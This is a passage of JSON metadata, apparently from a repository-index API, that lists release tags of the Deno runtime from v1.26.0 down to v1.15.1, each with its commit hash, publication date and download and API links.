d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v